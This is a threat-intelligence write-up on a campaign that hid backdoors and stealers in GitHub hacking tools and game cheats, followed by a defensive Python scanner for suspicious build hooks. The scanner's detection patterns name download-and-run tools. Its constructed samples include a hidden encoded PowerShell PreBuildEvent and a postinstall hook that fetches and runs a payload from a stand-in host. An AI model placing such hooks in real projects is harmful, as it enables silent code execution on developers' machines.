
A recent campaign has been identified where threat actors are distributing malicious code through GitHub repositories, specifically targeting hackers, gamers, and security researchers. The attackers embed backdoors in open-source tools, exploits, and game cheats, enabling remote access to infected systems. This tactic exploits trust in community-shared code, making it a significant threat to developers and security professionals who rely on GitHub for research or tooling.
Summary for Security Leaders
Attackers are leveraging GitHub’s open-source ecosystem to distribute malware under the guise of legitimate tools. The campaign focuses on repositories offering hacking utilities, game cheats, and automation scripts; 141 repositories were identified, 133 of them confirmed as backdoored. The payloads include remote access trojans (RATs) such as Sakura RAT and AsyncRAT, and the Lumma Stealer infostealer, delivered through obfuscated build scripts or dependencies. This poses a risk to any organization whose developers might clone and build one of these tools as part of their workflow.
- Primary Targets: Hackers, gamers, and researchers using GitHub for tools/scripts.
- Attack Vector: Malicious repositories with hidden backdoors in build scripts (e.g., a PreBuildEvent in a Visual Studio project file).
- Payloads: RATs (Sakura RAT, AsyncRAT) and the Lumma Stealer credential stealer.
- Defense: Code audits, behavioral monitoring, and community reporting.
Technical Analysis of the Campaign
The attackers use several techniques to look legitimate and evade detection. For example, some repositories are padded with automated commits (roughly 60,000 commits in a single repository) so that they appear active and well maintained. The infection chain is multi-stage: a VBS script executes PowerShell commands that fetch a 7-Zip archive, which in turn deploys an Electron application (SearchFilter.exe). Obfuscated JavaScript in the app (main.js) disables Windows Defender and profiles the host before the final payload is dropped.
Notably, the campaign repackages legitimate tools such as phpsploit (a PHP backdoor framework) and jok3r (a pentest automation tool) with added malicious code, so the trojanized copies look like the originals to a casual reviewer. Reporting from BleepingComputer and Kaspersky describes the repositories as the work of a single threat actor, though that actor's identity has not been established.
Defensive Recommendations
Organizations and individuals should adopt the following measures to mitigate risks:
- Code Audits: Before building, review project and build files (.csproj PreBuildEvent/PostBuildEvent entries and Exec tasks, package.json lifecycle scripts) and dependencies. Any build step that launches a hidden interpreter, decodes a base64 blob, or fetches from a remote URL should be treated as suspect until explained.
- Behavioral Analysis: Monitor process creation and network traffic during compilation and installation. A build that spawns a script host, PowerShell, or an archive extractor and reaches out to the internet warrants investigation.
- Community Vigilance: Report suspicious repositories to GitHub through its abuse-reporting process so they can be taken down, and warn the communities that share them.
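The build-file audit in the first recommendation, and the PreBuildEvent vector listed under the summary above, can be made mechanical. The following is an added example, not code from the original article or from any tool it names: it parses Visual Studio project files and package.json lifecycle scripts and flags commands that hide an interpreter, decode base64, or download from a remote URL. The three sample files are constructed; the base64 string is a placeholder (it decodes to "ABCD"), and example.invalid is a reserved name used so the sample resolves nowhere.

```python
import json
import re
import xml.etree.ElementTree as ET

# npm hooks that run automatically on install/build without the user invoking them.
NPM_HOOKS = {"preinstall", "install", "postinstall", "prepare", "prepublish",
             "prebuild", "build", "postbuild", "pretest", "test"}

# Indicators of a build step that hides an interpreter, decodes a blob, or fetches remote code.
SUSPICIOUS = [
    (r"\b(powershell|pwsh)\b.*(-enc\b|-encodedcommand|-w(indowstyle)?\s+hidden|-nop\b|bypass)",
     "hidden/encoded PowerShell"),
    (r"\b(wscript|cscript|mshta|rundll32|regsvr32|certutil|bitsadmin)\b", "LOLBin launcher"),
    (r"\b(curl|wget|iwr|invoke-webrequest|invoke-expression|iex)\b", "download-and-run primitive"),
    (r"https?://", "remote URL"),
    (r"\b(7z|7za|7zr)\b", "archive extraction"),
    (r"frombase64string|\[convert\]::", "base64 decoding"),
]


def find_suspicious(command, origin):
    """Return a finding dict for one build command, or None if nothing matched."""
    hits = [label for pattern, label in SUSPICIOUS if re.search(pattern, command.lower())]
    return {"origin": origin, "command": command.strip(), "indicators": hits} if hits else None


def _localname(tag):
    # Old-style .csproj files carry the MSBuild namespace; strip it for comparison.
    return tag.rsplit("}", 1)[-1]


def audit_csproj(xml_text):
    """Inspect PreBuildEvent/PostBuildEvent bodies and Exec task commands."""
    findings = []
    for elem in ET.fromstring(xml_text).iter():
        name = _localname(elem.tag)
        if name in ("PreBuildEvent", "PostBuildEvent") and elem.text and elem.text.strip():
            finding = find_suspicious(elem.text, name)
        elif name == "Exec":
            finding = find_suspicious(elem.get("Command", ""), "Exec")
        else:
            continue
        if finding:
            findings.append(finding)
    return findings


def audit_package_json(json_text):
    """Inspect only the lifecycle hooks npm runs implicitly."""
    scripts = json.loads(json_text).get("scripts", {})
    findings = [find_suspicious(cmd, f"scripts.{hook}") for hook, cmd in scripts.items() if hook in NPM_HOOKS]
    return [f for f in findings if f]


def audit_files(files):
    """files maps path -> text. Returns {path: findings} for files with at least one hit."""
    report = {}
    for path, text in files.items():
        if path.endswith((".csproj", ".vbproj")):
            hits = audit_csproj(text)
        elif path.endswith("package.json"):
            hits = audit_package_json(text)
        else:
            continue
        if hits:
            report[path] = hits
    return report


# Constructed samples, not artifacts from the campaign.
MALICIOUS_CSPROJ = """<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="15.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <PropertyGroup>
    <OutputType>Exe</OutputType>
    <PreBuildEvent>powershell -w hidden -nop -enc QUJDRA==</PreBuildEvent>
  </PropertyGroup>
</Project>"""

BENIGN_CSPROJ = """<Project Sdk="Microsoft.NET.Sdk">
  <PropertyGroup><OutputType>Exe</OutputType><TargetFramework>net8.0</TargetFramework></PropertyGroup>
  <Target Name="Stamp" BeforeTargets="Build"><Exec Command="echo build started" /></Target>
</Project>"""

MALICIOUS_PACKAGE_JSON = json.dumps({"name": "cheat-loader", "version": "1.0.0", "scripts": {
    "postinstall": "curl -s https://example.invalid/p.7z -o p.7z && 7z x p.7z && wscript loader.vbs",
    "start": "electron ."}})

if __name__ == "__main__":
    print(json.dumps(audit_files({"tool/tool.csproj": MALICIOUS_CSPROJ, "clean/clean.csproj": BENIGN_CSPROJ,
                                  "cheat/package.json": MALICIOUS_PACKAGE_JSON}), indent=2))
```

The point of scanning the project file rather than the source tree is that a PreBuildEvent runs as soon as the repository is built in Visual Studio, before any of the tool's own code has been read; the benign sample shows that an ordinary Exec task produces no finding.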
Relevance to Security Professionals
This campaign highlights the risk of building and running unvetted open-source code, particularly red-team tooling and research scripts that are rarely reviewed before use. For blue teams, it underscores the need for supply-chain controls and runtime monitoring of developer workstations, which often sit outside the strictest monitoring. System administrators should enforce policies on third-party code execution, and threat intelligence teams should track the related indicators of compromise (IoCs).
Conclusion
The abuse of GitHub repositories for malware distribution is a growing trend, exploiting trust in open-source collaboration. Security teams must prioritize code review processes and educate developers on the risks of unverified dependencies. Future attacks may leverage similar tactics, making proactive defense strategies critical.
References
- “Hacker targets other hackers and gamers with backdoored GitHub code,” BleepingComputer, Jun. 4, 2025.
- “Malicious code in GitHub: A hidden threat,” Kaspersky Blog, Feb. 25, 2025.
- phpsploit, GitHub repository (accessed Jun. 4, 2025).
- jok3r, GitHub repository (accessed Jun. 4, 2025).